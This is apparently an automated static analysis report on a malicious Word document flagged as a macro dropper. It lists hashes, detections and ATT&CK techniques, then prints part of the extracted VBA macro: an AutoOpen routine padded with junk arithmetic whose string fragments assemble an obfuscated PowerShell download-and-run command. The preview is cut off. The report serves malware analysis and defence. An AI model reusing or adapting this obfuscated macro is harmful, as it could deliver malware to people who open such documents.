Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3817f51e7ed26dd8…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 133.5 KB
Created: 2018-02-13 20:05:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: 49c5077d82b42f904278e32aad2d0874
SHA-1: f64f942ea887336a4a14cc0a4e4489fc28764c70
SHA-256: 3817f51e7ed26dd8e620b23345d7debfbb6cd1a072cb00f2986acb417d73a853
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. The macro uses the Shell() function and Application.Run to execute arbitrary code, indicating that it is designed to download and run a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6448022-0' further supports its role as a dropper.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6448022-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6448022-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 25088 bytes
SHA-256: ee6dd68907c1a9bb5a7e8a4777911dbd6afc70d6f53c44aca1fc443e2ddee9bc

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ulbBrLvSFZSi"
Sub AutoOpen()
On Error Resume Next
CUAiHFANr = (ZSMvGFdb - Int(EPIjtuNTsDMJ) * brjpZLwR / Oct(YSTJjsNDQ) - (PzIJ - Sin(8854580)))
kHntmIKfM = (qVP - Int(fSfYbqq) * jLUFom / Oct(uWSh) - (ESXCfUNnHFs - Sin(4565815)))
wllnkahSD = (XbZhTYY - Int(hXndNNu) * tGdCIiTwG / Oct(BTJ) - (lOijuwdwApOpX - Sin(3950705)))
Application.Run "TrfpvFH", GsaIIiAAFIQ
jUYXtIhap = (LsI - Int(aQXFImmZu) * SzwvGonTH / Oct(MlidaBNKYhYBoA) - (kSJjliKa - Sin(9126625)))
EvJmUBNrl = (Qoltf - Int(YbAN) * RJwX / Oct(VinWQCLj) - (irbqXTjP - Sin(6018544)))
jjwYiYMGK = (qnlLP - Int(fiEPsOcCUAPwld) * YBiOnXzAPJKsz / Oct(lsjMrrlbAnVHv) - (dIPU - Sin(6311423)))
End Sub
Function GsaIIiAAFIQ()
On Error Resume Next
OiYqXdiRu = (KmMaKm - Int(iEUcj) * SKXhIUJ / Oct(RzwuMZTL) - (JcvWzJLrhbUNDr - Sin(2615805)))
mYNKXVXHiSr = (wcn - Int(FrGPutpQfzM) * SGLzlzVALpas / Oct(IOFiqQwfZsRW) - (bETvLkOduw - Sin(6161823)))
NSLnXEprww = (RwHmaP - Int(NZlfjh) * jPKsNtdFXRjQ / Oct(piLNRZUYU) - (tzdAIGpZkNXE - Sin(9824871)))
dDRCVElk = TmHvYRs + Mid(irHLqk + "sjKifovbmwtHIcHjIBq73+q73n+uBnt'+'hkt(10000,thk+tuBn+uBnhk 2821uBn+uBn33)thk+thk;thk+thkf1thk+thkhuBn+uBnAthk+thkDCthk+thuBn+uBnkXthk+thk = ythkq73+q73+thkxthut" + vzJmzbY, 18, 141)
TqwULH = (wCGlirLhnkMuz - Int(prYZrRLbBHrY) * Jzt / Oct(NrwJHf) - (EXNjWcDRbdDs - Sin(3874484)))
DbaIwlBta = (HPhVBztGpChtU - Int(CAdhMiVUEiEZDa) * YFHZVGcRoGfwwi / Oct(wcHFO) - (zVflZmLCQ - Sin(5373217)))
MaSTKtzK = (TIQwaUwrajpbjl - Int(mtfcRwLX) * jbnvUQOX / Oct(jdpROXIJNn) - (KuwACzSWnKzH - Sin(7250714)))
CtYTDqnWBiV = CjmkMZqFKl + Mid(jOYOJMPMa + "pMJquzDCWWQHZUYMQMbYJSyxJthk,['+'cHar]39-crEPlu'+'Bn+u'+'Bnace ([cHar]'+'102+[cHar]49+[cq73+q7cZFdQfwIb" + tjsUwh, 23, 72)
FwArokdmw = (dWszBsVinOTC - Int(jFdYWs) * DMchd / Oct(ldvij) - (CuuJVravXpJdQ - Sin(3388784)))
qqWoZpB = (mwwbCjvm - Int(tLTqGr) * JfbzSovIjvz / Oct(NDzQLnwfwCh) - (HHiQ - Sin(1957724)))
VQpDNcQfmZ = (kofFzzpS - Int(wCov) * mIZN / Oct(uHDILkHwSsKKf) - (ILIHIDBbthAdKH - Sin(5102635)))
OsRMkCfZcA = NzjDXKURzzHhU + Mid(HUIkXjOocn + "sXuwrPbtOBjopXwYOOSAqreq73,[chAR]36  -RePlACE  ([chAR]80+[chAR]90+[chAR]115),[chAR]124))').ReplAce(([cHaR]117+[cHaR]104+[cHaR]66),[stRING][cHaR]36).ReplAce('q73',[stRING][cHaR]39) ) YiwzqiDY" + UzskTlWDZAYcF, 23, 160)
wtXPKcws = (sicnnLBFUm - Int(FUUfs) * RHdwCLYlurbZjS / Oct(OHtRBOdwqNtjw) - (FfsEwKkfl - Sin(8106397)))
PkOPJ = (EBtTafo - Int(QqMaOqj) * JmiIbcHoLjVj / Oct(KjVD) - (zMjfQiFPfmtFiN - Sin(2504696)))
CiqipVU = (bsDhrbt - Int(HrKE) * FHqWP / Oct(WFdWACMwVvGEH) - (mjrSVHVS - Sin(5975198)))
hFQwz = wiRWPQhjTU + Mid(zWZuoXqmvdBQJ + "uioiCyxJtq73+q73hk+thkeyxJ+thk+thkytq73+q73hk+tq73+q73hkxJ'+'thk+thkw-obj'+'ecq73+q73yxJ+yxJthk+uBn+uBnthktyxthk+thkJthk+t'+'hk) rthk+thkathk+thkndothk+uBn+uq73+q73Bq'+'73+q73ntsLjcOWbRm" + TOVIiaAXwtcsI, 6, 172)
lZNpLHr = (cAIWrtYpnjVkVO - Int(cpuWXmVUdDOi) * GvmqsYbfVJ / Oct(PbwOADlvJK) - (iJDhKGffSc - Sin(2967450)))
kSmoXw = (jrufswnLHjNGw - Int(GUaSTUWaNcmL) * UzqqEz / Oct(NWGYtwWzYBv) - (lVzLFAJuVIiRsh - Sin(6599239)))
RjEjfhmwNO = (LQpJGMb - Int(OBYUwXCMjpZ) * UolquFOEspfMQ / Oct(nIM) - (qYtQwDbowzG - Sin(3467424)))
asfpnRTmfC = ZYBDaiCiOU + Mid(QwWDfifYIAmC + "BvlPThFNNEUVbEERGathk+thkuBn+q73+q73uBniwYthk+thkANgY1o(), f1hthk+thkSthk+thkDtq73+q73hk+thq73+q73kCthk+thk'+')q73+q73;thq73+q73k+thk&(yxthk+tq73+q73DWXlpzu" + ZWQYAIYEaF, 19, 131)
ZLDwlHKn = (FQcMYoaVZ - Int(hPkBOMRq) * Fqs / Oct(zkIthZQUtH) - (pTRnVLbdf - Sin(3783001)))
DCdCuOlh = (zVH - Int(kIO) * wkNkfbQv / Oct(wJDnHHMuviUsi) - (NMwlml - Sin(6049270)))
OMXWoZVwdp = (HFUItcjlLFQj - Int(WQNrOvHoiu) * UXzYjqdJMG / Oct(zTz) - (jLKSOc - Sin(9153912)))
WFWuSlkPk = DHpzXfzOBwXq + Mid(WMEvjuAu + "wbwawEzHJzwzAmQTXYwhk)uBnq73+q'+'73).REplaCe(uBnthkuBn,[sTrIng][CHa'+'r]39).REplaCe(uBn76Gq73+q73uBn,[sTrq73+q73
... (truncated)